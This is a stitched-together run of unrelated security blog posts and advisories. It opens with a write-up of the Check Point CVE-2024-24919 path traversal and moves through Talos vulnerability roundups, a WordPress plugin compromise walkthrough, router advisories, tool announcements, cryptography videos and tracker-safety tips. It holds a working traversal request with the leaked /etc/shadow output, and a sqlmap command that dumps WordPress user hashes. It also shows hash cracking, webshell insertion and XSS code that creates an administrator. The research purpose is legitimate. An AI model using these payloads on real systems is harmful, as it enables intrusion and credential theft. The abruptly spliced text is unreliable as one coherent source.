Attempting to add path traversal elements such as .. in the URL bore no fruit, as the webserver would handle them correctly - but what about the POST body? That is exempt from the webserver's path handling code. We tried adding the usual ../../etc/passwd payload , but were soon met with disappointment, as all we received was a measly 404. The server logs showed that the appliance was indeed refusing to serve our path:
[vpnd 29382 4082644928]@i-022337f52dc65ca35[30 May 3:02:00][slim] http_get_CCC_callback: Invalid filename: /opt/CPsuite-R80.40/fw1//../../etc/passwd
No good! How do we work out whatβs happening, and elevate ourselves beyond blind guesses? Why, by taking a look at that big sub_80F09E0 , of course!
Understanding the decompiled code
The large handler function may seem daunting, but it is actually pretty straightforward. Switching to the vulnerable version of the code, we can see from a quick skim that it performs file I/O, given away by the telltale references to _fopen and _fread - this is undoubtedly the place to find our bug. But what is it doing?
It is slightly difficult to see what the code is doing because of the unusual way that it references string resources, which IDA doesnβt pick up. Take a look at the following code snippet:
Whatβs happening here? Well, the code is comparing something (the URL the user requested) with a number of hardcoded strings, located in a string table. IDA doesnβt know where the string table is, but GDB can tell us at runtime - it turns out to be here:
Easy enough - the code is checking if the user is requesting any of the files in the list, and will only permit the download if it matches. But thereβs a βbugβ in this code. Can you spot it?
Thatβs right! The bug isnβt anything complex or involved, it lies in the developerβs use of the strstr function. This function, as C gurus will know, doesnβt compare two strings outright, but searches one string for another string. This immediately got the gears turning in our head - can we abuse this sloppy matching to traverse, simply by requesting a relative path that includes one of the strings from the table? As long as one of the strings is present inside the path, the check will pass and the file will be served.
Well, it turns out we canβt. We can supply paths such as icsweb.cab/../../etc/passwd, but the OS isnβt dumb, and will fail to find the file, complaining that icsweb.cab is a file, and not a directory. Weβre close, though - I can almost taste it! Letβs keep looking at that code.
Hereβs a very similar chunk of code, found just underneath the first. Again, weβre iterating a string table, and comparing with the requested URL. Again, we pull out GDB, and take a look at the string table it is using:
Short but sweet. We got very excited when we saw this entry - can you see why?
Yes, exactly! Because of the slash at the end of the string. That suggests that this entry isnβt a file, but a directory, which would mean we can traverse into it and then back out via the venerable .. . As long as we have the string CSHELL/ somewhere in the requested file, the request will be accepted, right?
Well, we tried, and with bated breath submitted the following request:
POST /clients/MyCRL HTTP/1.1
Host: <redacted>
Content-Length: 39
aCSHELL/../../../../../../../etc/shadow
We were rewarded with the contents of requested file.
HTTP/1.0 200 OK
Date: Thu, 30 May 2024 01:38:29 GMT
Server: Check Point SVN foundation
Content-Type: text/html
X-UA-Compatible: IE=EmulateIE7
Connection: close
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Length: 505
admin:$6$rounds=10000$N2We3dls$xVq34E9omWI6CJfTXf.4tO51T8Y1zy2K9MzJ9zv.jOjD9wNxG7TBlQ65j992Ovs.jDo1V9zmPzbct5PiR5aJm0:19872:0:99999:8:::
monitor:*:19872:0:99999:8:::
root:*:19872:0:99999:7:::
nobody:*:19872:0:99999:7:::
postfix:*:19872:0:99999:7:::
rpm:!!:19872:0:99999:7:::
shutdown:*:19872:0:99999:7:::
pcap:!!:19872:0:99999:7:::
halt:*:19872:0:99999:7:::
cp_postgres:*:19872:0:99999:7:::
cpep_user:*:19872:0:99999:7:::
vcsa:!!:19872:0:99999:7:::
_nonlocl:*:19872:0:99999:7:::
sshd:*:19872:0:99999:7:::
There we go! A path traversal leading to an arbitrary file read! Since we are able to read such a critical file - the shadow password file - we must be running as the superuser, and able to read anything on the filesystem we choose.
Wait, what?!
At this point, we were somewhat confused. What weβd found is an arbitrary file read, allowing us to read any file on the system. This is much more powerful than the vendor advisory seems to imply.
We rushed to patch our box, and confirm that we had indeed found CVE-2024-24919, and not some other bug, and were mildly surprised that, yes, this is CVE-2024-24919, and yes, it is an arbitrary file read.
Interestingly, the vendor states that the issue only affects devices with username-and-password authentication enabled, and not with the (much stronger) certificate authentication enabled. Looking at the code, we canβt see any obvious reason for this, and we do wonder if a user who has a valid certificate can exploit the issue even when password authentication is disabled.
We were also somewhat amused by the vendorβs remediation advice, which includes this gem:
To prevent attempt to exploit this vulnerability, you must protect the vulnerable Remote Access gatewayΒ behindΒ a Security Gateway with both IPS and SSL Inspection enabled.
Obvious grammar errors aside, the advice to place your hardened border gateway device behind another hardened border gateway device gave us a chuckle.
Conclusions
That bug wasn't too difficult to find, and was extremely easy to exploit once weβd located it (full exploitation is left as an exercise for the reader - we wouldnβt want to take all the fun out of the bug).
Weβre a little concerned by the vendorβs statement, though - it seems to downplay the severity of this bug. Since the bug is already being used in the wild, by real attackers, it seems dangerous for the bug to be treated as anything less than a full unauthenticated RCE, with device administrators urged to update as soon as humanely possible. They state:
The vulnerability potentially allows an attacker to access information on Gateways connected to the Internet
This is quite a confusing statement, given that Internet connectivity is not a requirement. The words 'access information' are doing some seriously heavy lifting here, as while they may be technically correct, in the most pedantic sense of the word, they minimize what is, in all reality, a very serious bug which should be treated as 'world ending' (at least, by those administrators who do not have a second Check Point device protecting their actual Check Point device).
The vendor, Check Point, have released βhotfixβ for the bug, which administrators are instructed to apply if they are affected (refer to the vendor advisory for details).
AtΒ watchTowr, we believe continuous security testing is the future, enabling the rapid identification of holistic high-impact vulnerabilities that affect your organisation.
It's our job to understand how emerging threats, vulnerabilities, and TTPs affect your organisation.
If you'd like to learn more about theΒ watchTowr Platform, our Attack Surface Management and Continuous Automated Red Teaming solution, please get in touch.
Cisco Talos is preparing to release the first in a series of changes to our Web Categorization system, which is designed to simplify the verbiage we use.Β
In mid-June, we're adding a new βGenerative AIβ category that will apply to certain websites. The βContent Categoryβ appears whenever a user searches for a domain on the TalosIntelligence.com Reputation Center.Β Β
Generative AI applies to any site βwhose primary purpose is to use artificial intelligence models to generate output in the form of text, audio, video or images based on user-supplied prompts.β This does not include βtechnologies which tangentially use generative AI as part of their service.βΒ
We are also renaming βDOT & DOHβ to βEncrypted DNSβ to better reflect what this category includes.Β Β
Prior to these updates, we recommend revisiting your acceptable use and security policies to see if these changes may affect your current operations.Β
As we evolve to better understand data, threats, and user behavior, we will continue to improve our intelligence, providing you the ability to make more informed decisions to keep your network safe without becoming prohibitive to your users. Please stay tuned for additional planned changes to our Content Categories in the coming weeks and months.Β
For detailed information on the current Content and Threat Categories, please visit the Intelligence and Threat Categories page.Β
The Generative AI category will be available in a future release of Meraki, Secure Access and Umbrella.Β Β
Cisco Talosβ Vulnerability Research team has helped to disclose and patch more than 20 vulnerabilities over the past three weeks, including two in the popular Adobe Acrobat Reader software.
Acrobat, one of the most popular PDF readers currently available, contains two out-of-bounds read vulnerabilities that could lead to the exposure of sensitive contents of arbitrary memory in the application.
There are also eight vulnerabilities in a popular line of PLC CPU modules commonly used in automated environments.
For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligenceβs website.
Out-of-bounds read vulnerabilities in Adobe Acrobat
Discovered by KPC.
Adobe Acrobat Reader contains two out-of-bounds read vulnerabilities in its Font feature that could lead to the disclosure of sensitive information.
TALOS-2024-1946 (CVE-2024-30311) and TALOS-2024-1952 (CVE-2024-30312) are triggered if the targeted user opens an attacker-created PDF that contains a specially embedded font.
An adversary could exploit these vulnerabilities to read arbitrary memory of the process that runs when Acrobat tries to process the font. Itβs possible the adversary could even view sensitive components of arbitrary memory, which they could use in follow-on attacks or the exploitation of other vulnerabilities.
TALOS-2024-1952 is the same exploit as outlined in TALOS-2023-1905, a previously disclosed vulnerability, because Adobeβs initial patch did not properly protect against all possible attack vectors.
Privilege escalation vulnerability in Foxit PDF Reader
Discovered by KPC.
Foxit PDF Reader contains a privilege escalation vulnerability that could allow an adversary to execute commands with SYSTEM-level privileges. Foxit PDF Reader is one of the most popular alternatives to Acrobat Reader available. It also supports the embedding of JavaScript, which is another possible attack vector for adversaries.
TALOS-2024-1989 (CVE-2024-29072) occurs because of improper certification of the updater executable before executing it. A low-privilege user can trigger the update action, which can result in the unexpected elevation of privilege to the SYSTEM level.
Multiple vulnerabilities in popular image-processing library
Talos recently discovered multiple vulnerabilities in libigl, a C++ open-source library used to process geometric shapes and designs. It is commonly used in various industries, from video game development to 3-D printing.
Two out-of-bounds write vulnerabilities, TALOS-2023-1879 (CVE-2023-49600) and TALOS-2024-1930 (CVE-2024-22181), could lead to a heap buffer overflow. An attacker could exploit these vulnerabilities by tricking the targeted user into opening a specially crafted file.
TALOS-2024-1928 (CVE-2024-24584 and CVE-2024-24583) can be exploited in a similar manner, but in this case, leads to an out-of-bounds read.
Two other vulnerabilities, TALOS-2024-1929 (CVE-2024-24684, CVE-2024-24685 and CVE-2024-24686) and TALOS-2023-1784 (CVE-2023-35949, CVE-2023-35952, CVE-2023-35950, CVE-2023-35953, CVE-2023-35951), can cause heap-based buffer overflow issues if the adversary supplies a specially crafted .off file. .OFF files are commonly used to share 2-D and 3-D images.
Lastly, there is another out-of-bounds write vulnerability that is caused by an improper array index validation. TALOS-2024-1926 (CVE-2024-23951, CVE-2024-23950, CVE-2024-23949, CVE-2024-23947 and CVE-2024-23948) can be triggered by a specially crafted .msh file.
Remote Code Execution vulnerabilities and more in AutomationDirect CPU
Discovered by Matt Wiseman.
Several vulnerabilities were identified in the AutomationDirect P3 line of CPU modules. The P3-550E is the most recent CPU module released in the Productivity3000 line of Programmable Automation Controllers from AutomationDirect. The device communicates remotely via ethernet, serial and USB and exposes a variety of control services, including MQTT, Modbus, ENIP and the engineering workstation protocol DirectNET.
Four of the vulnerabilities found in these PLC CPU modules received a CVSS security score of 9.8 out of 10, making them particularly notable.
TALOS-2024-1942 (CVE-2024-21785) is a leftover debug code vulnerability that allow an adversary who can communicate to the device over ModbusRTU to enable the deviceβs diagnostic interface without any other knowledge of the target device. There is also TALOS-2024-1943 (CVE-2024-23601) which can lead to remote code execution if the attacker sends a specially crafted file to the targeted device and TALOS-2024-1939 (CVE-2024-24963 and CVE-2024-24962) which are stack-based buffer overflows that can also lead to remote code execution if the attacker sends a specially formatted packet to the device.
TALOS-2024-1940 (CVE-2024-22187) and TALOS-2024-1941 (CVE-2024-23315) are both Write-What-Where vulnerabilities that may be triggered if an adversary sends a specially crafted packet to the targeted machine. An adversary who submits a series of properly formatted requests to exploit this vulnerability could modify arbitrary memory regions on the device, potentially resulting in arbitrary remote code execution.
A heap-based buffer vulnerability, TALOS-2024-1936 (CVE-2024-24851), also exists if an adversary sends a specially crafted packet to the targeted device. In this case, the adversary could cause the device to crash due to memory access violations.
Similarly, TALOS-2024-1937 (CVE-2024-24947 and CVE-2024-24946) can also crash the device by exploiting two different functions on the device which are vulnerable to heap-based buffer overflows.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) also released an advisory covering these vulnerabilities, as the P3 line is commonly used in U.S. critical infrastructure and ICS networks. CISA provided users with a list of possible mitigations for these vulnerabilities and other steps administrators can take to protect ICS environments. The agency also stated that organizations in the commercial facilities, critical manufacturing and information technology sectors could be affected.
WordPressΒ : From vulnerability identification to compromising
WordPress Core is the most popular web Content Management System (CMS). This free and open-source CMS written in PHP allows developers to develop web applications quickly by allowing customization through plugins and themes. WordPress can work in both a single-site or a multisite installation.
Although, as demonstrated by the recent CVE-2024β4439 vulnerability, WordPress is not flawless, it remains an extremely robust solution, and from an attackerβs point of view, itβs much easier to find another entry point to compromise a WordPress instance.
Luckily (or not) this other vector exists and itβs WordPress plugins. With nearly 60,000 free extensions available, any one of them can represent a possible gateway to a complete compromise of your instance.
Based on our day-to-day work at Tenable Research, we will illustrate this in this article through different steps/scenarios on a real WordPress instance.
1/ Identify available WordPress plugins
When a WordPress plugin is created, developers can rely on a number of standards. Among these standards is the βReadme.txtβ file, which many pluginsΒ respect.
This file can be used by an attacker to identify whether or not a plugin is available. In the knowledge that this file is most of the time available at the URL βhttp://WORDPRESS/wp-content/plugins/[PLUGIN SLUG]/readme.txtβ using a wordlist of plugin names, an attacker can perform bruteforce to identify available plugins.
We can see here that we have two plugins installed
If you take a closer look at the second one, youβll see that itβs installed in versionΒ 2.9.7
NoteΒ : Sometimes the stable tag is empty but you can still look at the changelog section
A quick search reveals that this plugin is vulnerable to an unauthenticated SQL injectionΒ !
Now that weβve identified the available plugins and that one of them is vulnerable, weβll now look at how to compromise the WordPress instance.
2/ From SQL Injection to complete compromission
First, you need to understand the vulnerability in order to understand how to exploit it. EitherΒ by
Downloading a vulnerable version, looking at the code and trying to reproduce the vulnerability
Or a public exploit is already available
In our case, the vulnerability is detailed in this article and the command to exploit it via the SQLmap tool is provided.
With SQL Injection, among the available techniques, the most common consists of extracting the users and their passwordΒ hash.
sqlmap -u "http://192.168.1.27/?rest_route=/pmpro/v1/order&code=a" -p code --dbms=MySQL -dump -T wp_users -C user_login,user_pass [...] [14:59:53] [INFO] GET parameter 'code' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] [...] GET parameter 'code' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection point(s) with a total of 62 HTTP(s) requests: --- Parameter: code (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: rest_route=/pmpro/v1/order&code=a' AND (SELECT 1804 FROM (SELECT(SLEEP(5)))jJJd) AND 'MnNj'='MnNj [...] Database: wasvwa Table: wp_users [2 entries] +------------+------------------------------------+ | user_login | user_pass | +------------+------------------------------------+ | subscriber | $P$BQG8CvNGjGGbMmr5KxN8p3BnwdgMbf0 | | admin | $P$BUwEadKq2ID1rSD6/G4/tTf85WONEf1 | +------------+------------------------------------+
NoteΒ : Users are usually stored in the βwp_usersβ table, with βwp_β being the basic prefix. If this is not the case, you can search for the table name/prefix by listing the columns with the following SQLmap commandΒ :
Now that we have recovered the users and the hashes we need to find the password in clear text. We will not go into the details of this step here and simply use hashcat with a wordlist to recover the password in plainΒ text.
The only important option to understand here is `-m 400` which translates as βhash mode 400β. The number 400 corresponds to the password hashing technique used by WordPress. In the background, WordPress uses the βwp_hash_password()β function which uses the PHPass library and, in short, returns an MD5 hashed password with additional security mechanisms.
To summarize, we identified the available plugins, one of them is in a version vulnerable to an unauthenticated SQL injection which we exploited to retrieve the list of available users with their hashes which we bruteforce to recover the clear password of the administratorΒ !
The next step is therefore to authenticate, to do this, by default, the URL of the WordPress admin panel is available at the URL /wp-admin/
Except that in our case, we are redirected to a 404! If we return to the list of installed plugins, we remember that βWPS Hide Loginβ is installed.
WPS Hide Login is a very light plugin that lets you easily and safely change the url of the login form page to anything youΒ want.
Once again, we will be able to use our SQL injection to find the real login URL. For this plugin, what we are looking for is stored in column βoption_valueβ of the table βwp_optionsβ
We can now access the login page and authenticate.
Once authenticated, to obtain an RCE, among the available techniques the two simplest are as followsΒ :
Upload a new malicious plugin to executeΒ code
Edit an existing file to insert malicious code
The second is the simplest because everything is already there by default, you just have to go to βTools > Theme File Editor > Themes Functionsβ and insert a piece of PHP code allowing you to executeΒ code.
Once saved, we can therefore execute arbitrary code on our WordPress instance
3/ From Cross-Site Scripting to complete compromission
Less direct than an SQLi, an XSS can also compromise a WordPress instance, and for this example weβll take the WP RSS Aggregator versionΒ 4.23.8.
This plugin is vulnerable to a reflected XSS and therefore requires that the URL containing the payload be transmitted directly to the administrator.
The original request can be obtained by going to the plugin page and clicking on the βDismiss this notificationβ buttonΒ :
On the code side, in version below 4.23.9 of WP RSS Aggregator, this vulnerability is present due to the use of the `sprintf()` function, which is used to display the response to theΒ user.
The notice_id value is inserted into the message without filtering allowing to insert arbitrary HTML codeΒ :
There are several XSS techniques that can be used to take control of an instance, the two most common beingΒ :
Add a new administrator
Modify page code directly to insert aΒ webshell
The code below, for example, is used to create a new administratorΒ :
xhr = new XMLHttpRequest(); xhr.open("POST", requestURL, true); xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xhr.send(params);
Simply save the code to a file on a publicly accessible server, send the URL containing our payload (loading our remote script) and youβreΒ done.
A new administrator is addedΒ :
As a side note, the plugin author has corrected the vulnerability by escaping the HTML code of Exceptions messagesΒ :
Which corrects the vulnerabilityΒ :
This article shows how to identify available plugins, compromise an instance via SQL Injection while bypassing a defense mechanism that hides the login URL, and also how to create a new administrator via Cross-Site Scripting.
Obviously, this article is only an introduction and does not describe all possible cases or less likely/common scenarios, such as the possibility of creating an administrator via SQL Injection.
However, we understand that although WordPress is reputed to be robust, plugins are not necessarily so and can therefore allow your instance to be compromised. It is therefore essential to review the plugins you install, check that they are up to date and if possible enable automatic updates.
CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') may allow Unauthenticated RCE
Successful exploitation of these vulnerabilities could allow an attacker to execute unauthorized code on the platform.
CWE-305 Missing Authentication for Critical Function
Missing Authentication for Critical Function may allow Authentication Bypass
Successful exploitation of these vulnerabilities could allow an attacker to execute unauthorized code on the platform
CWE-330 Use of Insufficiently Random Values may allow Authentication Bypass
Successful exploitation of these vulnerabilities could allow an attacker to execute unauthorized code on the platform.
CWE-20 Improper Input Validation:
Improper Input Validation may allow Denial of Service. Successful exploitation of these vulnerabilities could allow an attacker to execute unauthorized code on the platform.
CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'):
Successful exploitation of these vulnerabilities could allow an attacker to execute unauthorized code on the platform.
This vulnerability allows network-adjacent attackers to access or spoof DDNS messages on affected installations of TP-Link Omada ER605 routers. Authentication is not required to exploit this vulnerability. However, devices are vulnerable only if configured to use the Comexe DDNS service.
The specific flaw exists within the cmxddnsd executable. The issue results from reliance on obscurity to secure network data. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of root.
This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of TP-Link Omada ER605 routers. Authentication is not required to exploit this vulnerability. However, devices are vulnerable only if configured to use the Comexe DDNS service.
The specific flaw exists within the handling of DNS names. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a buffer. An attacker can leverage this vulnerability to execute code in the context of root.
This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of TP-Link Omada ER605 routers. Authentication is not required to exploit this vulnerability. However, devices are vulnerable only if configured to use the Comexe DDNS service.
The specific flaw exists within the handling of DDNS error codes. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root.
A couple months ago, my colleague Winston Ho and I chained a series of unfortunate bugs into a zero-interaction local privilege escalation in Zscaler Client Connector. This was an interesting journey into Windows RPC caller validation and bypassing several checks, including Authenticode verification. Check out the original Medium blogpost for Winstonβs own ZSATrayManager Arbitrary File Deletion (CVE-2023-41969)!
We are excited to announce the addition of a new provider in our open-source, multi-cloud auditing tool ScoutSuite (on GitHub)!
In April, we received a remarkable pull request from Asif Wani, Product Security Lead at DigitalOcean APAC, to integrate DigitalOcean services into ScoutSuite. After reviewing the request, NCC Group not only accepted his proposal, but also expanded it with new rules and services.
This new feature is currently included in the last version 5.14.0, adding DigitalOcean as a new cloud provider with twenty-eight new rules based in the hardening features provided by DigitalOcean.
The most significant changes are:
Core
Added support for DigitalOcean
DigitalOcean
Added new rules for managed databases
Added new rules for droplets
Added new rules for networking devices such as Load Balancers, Firewalls or DNS entries.
Letβs kick this off with some examples. Hereβs a seamless loop illustrating CBC-mode encryption:
Hereβs a clip showing a code block being rewritten to avoid leaking padding information in error messages:
Hereβs an illustration of a block cipher operating in CTS mode:
You may be surprised to learn that each of these illustrations was generated from β€30 lines of code (30, 9, and 23 lines, respectively), without any golfing. The exact code used can be seen in the Cranim example gallery, along with many other examples of what this toolkit can do.
But letβs take a step back. You may be familiar with the Cryptopals Guided Tour. These longform videos discuss various topics from cryptography, loosely following the path laid out by the cyptopals challenges, and starting with set 2 I began to bring in custom-made visual aids to support discussion as the concepts involved grew more abstract.
To create these visuals, the tool I reached for was Manim, a math visualization library best known for its use in 3Blue1Brownβs videos (in fact, he is also Manimβs original author). But while this library is very powerful (seriously, check out their example gallery), it is biased towards math, not computer science. It lacks support for such basic tasks as visualizing (or rewriting) a buffer; drawing a wire diagram; modifying a code snippet; and so on. To adapt this library to my use case, I had to write an extensive plugin adding all this functionality and more. Today I am releasing this plugin, cranim, in the hope that it will be useful to other computer science educators. You can find installation and usage guidelines in the GitHub repo: https://github.com/nccgroup/manim-cranim
The default color scheme is optimized for accessibility; contrast between colors should be clear even to colorblind viewers. This color palette was originally published for use by data scientists in multicolor figures. The default background color, a warm and pleasant off-white, is similarly meant to promote legibility: studies have shown that dark text on light backgrounds scans faster and more accurately than the inverse. The precise tone of the background is intended to evoke a poorly-cleaned whiteboard, a familiar sight to any computer science student.
While the toolkit is oriented towards animations, Manim is equally capable of producing static images such as the illustration of CTS mode above; in cases where vector graphics are preferred, Manim can both consume and produce SVG files. The subset of Manim used by Cranim exclusively uses vector representations internally, making it a good fit for this use case.
Cranim is still under active development (as is the Guided Tour), so I have not yet written API docs; they will come as the API stabilizes. However, I keep the Example Gallery up to date, so you can turn to it for simple examples of idiomatic usage. If youβre interested in a less trivial example, the full source code for the animations used in the 17th Guided Tour video can be found in this gist (though note that parts of it are hacky, as it was written quickly and has not been reviewed or edited; in this sense it closely models the sort of code the average Cranim user might write).
If you make something with Cranim, please feel free to send it my way! Iβm curious to see what uses people find for this tool, and Iβm happy to take feature requests (or bug reports) on GitHub as well.
Hello and welcome back to the Cryptopals Guided Tour (previously, previously)! Today we are taking on Challenge 17, the famous padding oracle attack.
For those who donβt know, Cryptopals is a series of eight sets of challenges covering common cryptographic constructs and common attacks on them. You can read more about Cryptopals atΒ https://cryptopals.com/.
Thereβs a lot of practical knowledge wrapped up in these challenges, and working through them is an excellent way for programmers to learn more about cryptography β or for cryptographers to learn more about programming. We strongly encourage you to give them a try and to see how far you can get on your own.
The Guided Tour is here for you to check your work after completing a challenge, or to see how else you mightβve solved it β or for when you get stuck, canβt get yourself unstuck, and are looking for a nudge in the right direction. WeΒ stronglyΒ encourage you to try βlearning by doingβ before watching the videos. Youβll get more out of them that way!
These problems are complex, and if you take the shortest path to the solution, youβre sure to miss a lot of the sights along the way. It can be hard to know what youβre missing or where to look for it; thatβs where these videos come in. From the start, weβve prioritized detailed discussion; for set 2, we augmented these discussions with detailed animations showing exactly whatβs going on under the hood for each attack; for set 3, weβre maintaining these high production values, integrating more research, and open-sourcing the tool used to generate these animations: cranim, a powerful toolkit for cryptographic (and generic computer science) animations with an emphasis on visualizing buffers and data flows. Cranim was developed to support the Guided Tour but is built with flexibility in mind; I hope that other educators will find it useful.
Weβre also accelerating the release schedule, favoring individual video releases over dropping an entire set at once. When videos take this long to make, it only makes sense to release them as soon as theyβre ready.
If youβre just joining the Guided Tour, hereβs a playlist of the full series so far. Each video comes with a timestamped index of content so you can skip around as desired. Check the video descriptions, too; most of them also contain lists of links for further reading.
And now, at long last, here is the next installment of the Cryptopals Guided Tour. We hope you find this helpful and educational, and we look forward to bringing the next videos to you as soon as theyβre ready.
00:00 β Intro 00:53 β Big-picture view 01:47 β Padding oracles in the wild 02:33 β What happens if we provide an invalid token? 03:33 β Ruining a developerβs night 05:53 β Letβs take a look at the attack 06:48 β Single block case 09:02 β Confirming padding has length 1 09:28 β XOR algebra, and the full search 10:57 β Multi-block case 11:53 β How can you prevent this attack? 13:20 β Timing side-channels 16:57 β Bolting a MAC onto it 17:45 β Note on deniability 18:10 β MACing ciphertext vs MACing plaintext 19:55 β Recapping layers of defense 20:13 β Breaking each layer of defense 21:03 β As our side channel gets less reliable, how does the attack change? 22:28 β Tracking confidences 24:00 β False negatives and false positives 25:12 β Bayesβ Theorem 26:42 β Entropy 27:25 β Adding chart for expected informtion gained 28:14 β Heuristics 31:15 β Getting into trouble with MACs 33:00 β Time to write some code! 35:44 β Obligatory CSPRNG disclaimer 36:50 β Sketching out the scriptβs functions 39:30 β Implementing the multi-block case 40:43 β Implementing the easy functions 42:18 β Implementing the single-block case 49:10 β Testing the solution 49:49 β βI could just call it done here, butβ¦β 51:40 β Reading the plaintext 52:27 β Implementing the noisy oracle case and signing off
Before wrapping up this post, Iβd like to take a moment to thank Gerald Doussot and Javed Samuel for their continued patience, encouragement, and support with this very large undertaking. Iβd also like to thank my teammates in Cryptography Services for their thoughtful and attentive review, particularly Marie-Sarah Lacharite, Thomas Pornin, and Elena Bakos Lang, whose feedback has measurably improved this video (though of course I take full responsibility if any mistakes are found in it). On the logistical side of things, Ristin Rivera has also been invaluable throughout the publication process for this entire series.
I would also like to take a moment to thank the developers of Manim, without which these videos would not be possible in their current form. (By the way, if you want to make videos like these, my Manim plugin Cranim β which I developed to support this series β has now been publicly released!)
Finally, once again Iβd like to thank the authors of the Cryptopals challenges. Iβve spent a lot of time with their work and I appreciate the effort theyβve put into it.
Since the advent of products like the Tile and Apple AirTag, both used to keep track of easily lost items like wallets, keys and purses, bad actors and criminals have found ways to abuse them.Β
These adversaries can range from criminals just looking to do something illegal for a range of reasons, but maybe just looking to steal a physical object, to just a jealous or suspicious spouse or partner who wants to keep tags on their significant other.Β
Apple and other manufacturers who make these devices have since taken several steps to curb the abuse of these devices and make them more secure. Most recently, Google and Apple announced new alerts that would hit Android and iOS devices and alert users that their devicesβ location is being connected to any location-tracking device.Β Β
βWith this new capability, users will now get an β[Item] Found Moving With Youβ alert on their device if an unknown Bluetooth tracking device is seen moving with them over time, regardless of the platform the device is paired with,β Apple stated in its announcement.Β
Companies Motorola, Jio and Eufy also announced that they would be adhering to these new standards and should release compliant products soon.Β Β
Certainly, products like the AirTag and Samsung trackers that these companies have direct control over will now be more secure, and hopefully less ripe for abuse by a bad actor, but itβs far from a total solution to the problem that these types of products pose.Β
As Iβve pointed out in the past with security cameras and any other range of internet-connected devices, online stores are filled with these types of products, promising to track usersβ personal items with an app so they donβt lose common household items like their phones, wallets and keys.Β Β
Amazon has countless listings under βlocation tagβ for a range of AirTag-like products made by unknown manufacturers. Some of these products are slim enough to fit right into the credit card pocket of a wallet or purse,Β and others are smaller than the average AirTag and even advertise that they can remain hidden inside a car.Β Β
I admittedly havenβt been able to dive into these individual devices, but some of them come with their own third-party apps, which come with their own set of security caveats and completely take it out of platform developersβ hands.Β Β
There are also other βfind my deviceβ-type services that pose additional security concerns outside of just buying a small tag. Androidβs new, enhanced βFind My Deviceβ network is a crowdsourced solution to help users potentially find their lost devices, similar to iOSβ Find My network.Β Β
The Find My Device network works by using other Android devices to silently relay the registered deviceβs approximate location, even if the device being searched for is offline or turned off. In the wrong hands, there are a range of ways that can be abused on its own.Β Β
So, rather than relying on developers and manufacturers to make these services more secure, I have a few tips for how to use AirTag-like devices safely, if you really canβt come up with a better solution for not losing your keys.Β
Check for suspicious tracking devices. On iOS, this means opening the βFind Myβ app and navigating to Items > Items Detected Near You. Any unfamiliar AirTags will be listed here. On Android, you can do the same thing by going to Settings > Safety & Emergency > Unknown Tracker Alerts > Scan Now.Β
Remove yourself from any βSharing Groupsβ unless itβs a trusted contact in your phone using the Find My app on iOS.Β
If location tracking is your primary concern (especially for parents and their children) using the Find My app on iOS and Android is generally a more secure option than trusting a third-party app downloaded from the app store or relying on a Bluetooth connection.Β Β
Manage individual appsβ settings to ensure only the services that *really* need to track your deviceβs physical location are using it. (Ex., you probably donβt need Facebook tracking that information.)Β
Since AirTags are connected to your Apple ID, ensure that login is secured with multi-factor authentication (MFA) or using a passkey.Β Β
The one big thingΒ
Cisco recently developed and released a new feature to detect brand impersonation in emails when adversaries pretend to be a legitimate corporation. Threat actors employ a variety of techniques to embed brand logos within emails. One simple method involves inserting words associated with the brand into the HTML source of the email. New data from Talos found that popular brands like PayPal, Microsoft, NortonLifeLock and McAfee are among some of the most-impersonated brands in these types of phishing emails.Β Β
Why do I care?Β
Brand impersonation could happen on many online platforms, including social media, websites, emails and mobile applications. This type of threat exploits the familiarity and legitimacy of popular brand logos to solicit sensitive information from victims. In the context of email security, brand impersonation is commonly observed in phishing emails. Threat actors want to deceive their victims into giving up their credentials or other sensitive information by abusing the popularity of well-known brands.Β
So now what?Β
Well-known brands can protect themselves from this type of threat through asset protection as well. Domain names can be registered with various extensions to thwart threat actors attempting to use similar domains for malicious purposes. The other crucial step brands can take is to conceal their information from WHOIS records via privacy protection. And users who want to learn more about Cisco Secure Email Threat Defense's new brand impersonation detection tools can visit this site.Β
Top security headlines of the weekΒ
Adversaries have been quietly exploiting the backbone of cellular communications to track Americansβ location for years, according to a U.S. Cybersecurity and Infrastructure Security Agency (CISA). The official broke ranks with their agency and reportedly shared this information with the Federal Communications Commission (FCC). The official said that attackers have used vulnerabilities in the SS7 protocol to steal location data, monitor voice and text messages, and deliver spyware. Other targets have received text messages containing fake news or disinformation. SS7 is the protocol used across the globe that routes text messages and calls to different devices but has often been a target for attackers. In the past, other vulnerabilities in SS7 have been used to gain access to telecommunications providersβ networks. In their written comments to the FCC, the official said that these vulnerabilities are the βtip of the proverbial icebergβ of SS7-related exploits used against U.S. citizens. (404 Media, The Economist)Β
The FBI once again seized the main site belonging to BreachForums, a popular platform for buying and selling stolen personal information. Last year, international law enforcement agencies took down a previous version of the cybercrime site and arrested its administrator, but the new pages quickly emerged, using three different domains since the last disruption. American law enforcement agencies also took control of the forumβs official Telegram account, and a channel belonging to the newest BreachForums administrator, βBaphomet.β However, the FBI has yet to publicly state anything about the takedown or any potential arrests. BreachForums isnβt expected to be gone for long, as another admin named βShinyHuntersβ claims the site will be back with a new Onion domain soon. ShinyHunters claims theyβve retried access to the seized clearnet domain for BreachForums, though they did not provide specific methods. BreachForums is infamous for being a site where attackers can buy and sell stolen data, offer their hacking services or share recent TTPs. (TechCruch,HackRead)Β
